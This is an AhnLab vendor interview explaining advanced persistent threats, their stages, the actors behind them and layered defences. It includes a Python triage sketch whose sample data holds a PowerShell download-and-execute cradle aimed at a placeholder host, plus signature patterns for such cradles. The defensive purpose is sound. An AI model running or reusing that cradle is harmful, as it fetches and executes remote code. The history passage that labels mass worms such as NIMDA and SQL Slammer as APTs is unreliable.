Tom Hance: What are Advanced Persistent Threats?

AhnLab creates agile, integrated Internet security solutions for businesses and governments. AhnLab is the first and, to date, the only security company to offer a network- and host-based solution against advanced malware and APTs. By combining deep behavioral analysis, dynamic content inspection, and endpoint and server protection, AhnLab generates best-of-breed breach detection and threat prevention that scales easily for the largest high-speed networks. This multi-dimensional analysis approach is combined with exceptional service to create truly global protection against attacks that evade traditional security defenses and first-generation APT sandboxes. That's why more than 25,000 organizations rely on AhnLab's award-winning products and services to make the Internet safe and reliable for businesses.

Rake Narang: What is an APT? Can you give us a brief history of APTs?

Tom Hance: An APT, or Advanced Persistent Threat, is a malware type that can wreak havoc on computers, networks and entire organizations. APTs are extended campaigns often targeted at specific organizations, or groups of organizations, or at specific data to achieve a clear objective. They are well-researched and highly coordinated attacks. They’re designed to circumvent virtually all traditional defense mechanisms. APTs typically blend a broad range of tools and have a very specific objective such as theft of intellectual property or financial gain.

Looking at each word in the acronym helps to better understand APTs:

  • Advanced – the attacker has significant technical capabilities to exploit vulnerabilities in the target.
  • Persistent – APTs occur over an extended period of time, sometimes over the course of years.
  • Threat – in order for there to be a threat, there must be an attacker with both the motivation and ability to perform a successful attack.

APTs are considered successful when valuable information is exfiltrated from the network to criminal or state elements, or when the Advanced Persistent Threat opens opportunities for other sophisticated malware: targeted attacks, or ROP (Return Oriented Programming) attacks with similar financial or reputation-gain objectives. No sectors of industry are immune from targeted threats and APTs. In 2011, the most prevalent targets were the government and public sector, manufacturing, and finance.
Decades ago, in the ’80s, the worm worked its way from machine to machine, infecting computers one at a time. Famous early APTs included the LOVEBUG email virus, NIMDA (which became the most widely spread virus in just 22 minutes) and SQL Slammer. In 2012, APT attack techniques evolved further to disguise executable files with common application icons, like a Word .doc file or help files. The type and number of analyses done on a file depend on the file type.


Rake Narang: What are the characteristics of an APT and its life cycle?

Tom Hance: APTs use a range of tools, from common malware and social engineering to complex zero-day attack tactics to achieve their goals.  They typically progress through a series of stages as they develop and spread, for example:

  • Reconnaissance: Attackers research and identify their targets.
  • Intrusion: Spear-phishing e-mails target specific users within the target company with spoofed messages that include malicious links or malicious PDF or Microsoft Office document attachments.
  • Establishing a backdoor: Attackers try to get domain administrative credentials and extract them from the network.
  • Obtaining user credentials: Attackers gain access using stolen, valid user credentials.
  • Installing utilities: Programs installed on the target network install backdoors, grab passwords, steal email, and other tasks.
  • Privilege escalation, lateral movement, and data exfiltration: Attackers grab e-mails, attachments, and files from servers.
  • Maintaining persistence: If the attackers find they are being detected or remediated, they use other methods, including revamping their malware, to ensure they don’t lose their presence in the victim’s network.

Some of the above steps are iterative, particularly the last two. Almost all APT attacks begin at the client, the part of your network that connects to more parts of the Internet than any other. Simply visiting a website or viewing an HTML e-mail message can initiate what we call the “drive-by download.”  Along with web and e-mail-based delivery of malicious code, clients can also be infected via the illegal download of pirated software, music, and video files.  Servers, portable media, social networks, insider threats and wireless networks also pose serious APT and advanced malware risks.

Rake Narang: Who is behind most APTs and what resources do they have to be both advanced and persistent?

Tom Hance: It takes a special talent with a highly focused agenda to launch a targeted attack. Many of the individuals and organizations behind APTs, Trojans and botnets are highly paid professionals. And they are good at covering their tracks and their geographic source. China, Russia, and Eastern Europe are often home to the originators. The creators of APTs may have goals in writing their destructive code such as industrial espionage, monetary theft or disabling an organization’s networks for financial or political gain.

Looking back at some recent notorious APTs: Ghostnet was a botnet deployed to monitor the Dalai Lama’s agenda, Operation Aurora monitored Chinese dissidents’ Gmail accounts, Shady RAT was a botnet with government and global corporate targets, and Stuxnet attempted to disrupt Iran’s uranium enrichment program.

These malware creators have sophisticated corporate organizations backing their efforts and top-tier talent at their disposal. Some are even sponsored — and protected — by the governments of the countries in which they operate. At the same time, many other targeted attacks are organized by rank amateurs who deconstruct professionally built malware such as Stuxnet. Other amateurs use do-it-yourself kits purchased over the Internet for a few hundred dollars. The kits quickly generate thousands of new, untraceable malware variants and even have multi-language versions, technical support, and money-back guarantees. Someone with only a minimal understanding of malware and the Internet can join an existing criminal network for profit or sponsor his or her own within minutes. It’s so widespread that marketing programs help structure any budding online mobster’s financial success.  As I mentioned earlier, mischief isn’t what makes these criminals tick. Profit, money, intellectual property, identity information are the driving factors.

Rake Narang: What is the best defense against APTs?

Tom Hance: You need a well-planned defensive strategy to protect your organization from these sophisticated attacks. Despite these escalating threats, most organizations continue to respond with conventional security solutions, such as antivirus solutions, intrusion detection/prevention systems, next-generation firewalls, and web application firewalls. These organizations are limited by the time required to perform multidimensional threat analysis, the inability of these devices to perform this analysis, and the lack of an automated response to identified threats. Suffice it to say that traditional approaches are ineffective against today’s more sophisticated attacks. These approaches just weren’t designed to stop these threats.

The best defense is multi-dimensional, encompassing signature, behavior and dynamic content analysis at both the network and end-point level to detect advanced malware. You must protect all doors, which is to say that optimally you’ll want file-share and email protection integrated into your defense strategy. To detect malware at both the network ingress and egress points, between internal enclaves and at the host level, you’ll need a highly integrated solution. A local agent that blocks code execution and analyzes malware, blocking potentially harmful APTs at the host level, is critical. White lists, black lists, and signatures help as a good first filter, or what we consider “fast path technologies” to take down the easy stuff. This frees up resources to focus on more sophisticated objects. This kind of approach protects everything – networks, servers, endpoints and cloud resources.

On top of all this, user training is essential. Social engineering tricks and spear-phishing attacks can partially be thwarted when users are trained what to look for. In a survey we conducted, we found that almost 68% of trained security professionals have plugged a found USB drive into their laptops! It only takes one click to invite the criminal element into your network. Providing a general understanding of what not to do when online, together with a comprehensive network and host prevention solution, will result in more powerful protection for your network.
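The "fast path" described in the answer above, where allow lists, deny lists and signatures are applied first and only objects that survive them are handed to costlier behavioral analysis, sketched as an added Python example. This is not AhnLab's code or the logic of the MDS product; the sample payloads, their hashes and the two signature patterns are constructed for illustration only.

```python
"""Fast-path triage stage: allow-list, deny-list and signature checks run before
an object is escalated to expensive behavioral/dynamic analysis. Added example,
not vendor code; every indicator below is constructed for illustration."""
import hashlib
import re
from dataclasses import dataclass


def sha256(data: bytes) -> str:
    """Hex SHA-256 of an object's bytes, used as the fast-path lookup key."""
    return hashlib.sha256(data).hexdigest()


# Constructed reference payloads. In practice the allow list comes from a trusted
# inventory of known-good binaries and the deny list from vetted threat intel.
KNOWN_GOOD_PAYLOADS = {b"MZ\x90\x00 legitimate-updater-build-1"}
KNOWN_BAD_PAYLOADS = {b"MZ\x90\x00 fake-invoice.doc.exe"}
ALLOW_LIST = {sha256(p) for p in KNOWN_GOOD_PAYLOADS}
DENY_LIST = {sha256(p) for p in KNOWN_BAD_PAYLOADS}

# Constructed byte-pattern signatures: a PowerShell download cradle and an
# Office macro AutoOpen marker. Real signature sets are far larger and tuned.
SIGNATURES = {
    "ps_download_cradle": re.compile(rb"powershell[^\n]{0,80}DownloadString", re.I),
    "macro_autoopen": re.compile(rb"\bAutoOpen\b", re.I),
}


@dataclass
class Verdict:
    name: str
    decision: str  # "allow", "block" or "escalate"
    reason: str


def fast_path(name: str, data: bytes) -> Verdict:
    """Cheap checks first; anything they cannot decide is escalated, never dropped."""
    digest = sha256(data)
    if digest in ALLOW_LIST:
        return Verdict(name, "allow", "allow-list hash match")
    if digest in DENY_LIST:
        return Verdict(name, "block", "deny-list hash match")
    for sig_name, pattern in SIGNATURES.items():
        if pattern.search(data):
            return Verdict(name, "block", f"signature {sig_name}")
    # Unknown object: this is the "sophisticated stuff" the slow path exists for.
    return Verdict(name, "escalate", "no fast-path hit; send to behavioral analysis")


def triage(objects):
    """Run the fast path over (name, bytes) pairs and return one Verdict each."""
    return [fast_path(n, d) for n, d in objects]


def summarize(verdicts):
    """Count decisions so an operator can see how much the fast path absorbed."""
    counts = {"allow": 0, "block": 0, "escalate": 0}
    for v in verdicts:
        counts[v.decision] += 1
    return counts


# Constructed sample objects as they might arrive from email, web or file-share capture.
SAMPLE_OBJECTS = [
    ("updater.exe", b"MZ\x90\x00 legitimate-updater-build-1"),
    ("invoice.doc.exe", b"MZ\x90\x00 fake-invoice.doc.exe"),
    ("report.docm", b"... Sub AutoOpen() ... End Sub"),
    ("cradle.cmd", b"powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"),
    ("unknown.bin", b"MZ\x90\x00 something never seen before"),
]

if __name__ == "__main__":
    verdicts = triage(SAMPLE_OBJECTS)
    for v in verdicts:
        print(f"{v.name:16} {v.decision:9} {v.reason}")
    print(summarize(verdicts))
```

The ordering matters: the allow list is consulted first so known-good objects cost almost nothing, the deny list and signatures then remove the known-bad, and the default for anything undecided is escalation rather than a silent allow. That default is what keeps the fast path from becoming a blind spot for never-seen-before objects, which is exactly the class the behavioral layer is meant to catch.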

Company: AhnLab, Inc.
2310 Walsh Avenue, Santa Clara, CA 95051 U.S.A.

Founded in: 2013
CEO: Philip Kim
Public or Private: Private
Head Office in Country: United States
Products and Services: AhnLab USA is a leading provider of information security products and services for enterprise and government organizations. AhnLab USA security products protect the world from sophisticated malware and Advanced Persistent Threat attacks. AhnLab’s Malware Defense System is the first fully integrated system to allow simultaneous and instant protection of critical data assets at the network perimeter, for internal network boundaries and at the network end-points. AhnLab MDS stops sophisticated never-seen-before attacks with powerful layered protection for web, email and file-share traffic in a single, lightning-fast appliance ideal for 100Mbps, 1Gig and 10Gig boundary applications. The MDS works fluidly with AhnLab's optional MDS Client Agent to protect endpoints from rogue and BYOD-level infections.

Company’s Goals: To become the leading US provider of enterprise strength security solutions against advanced malware.
Key Words:
Advanced Persistent Threats, DDoS attacks, Zero Day Exploits, APTs, MDS, Malware Defense System, AhnLab MDS, advanced malware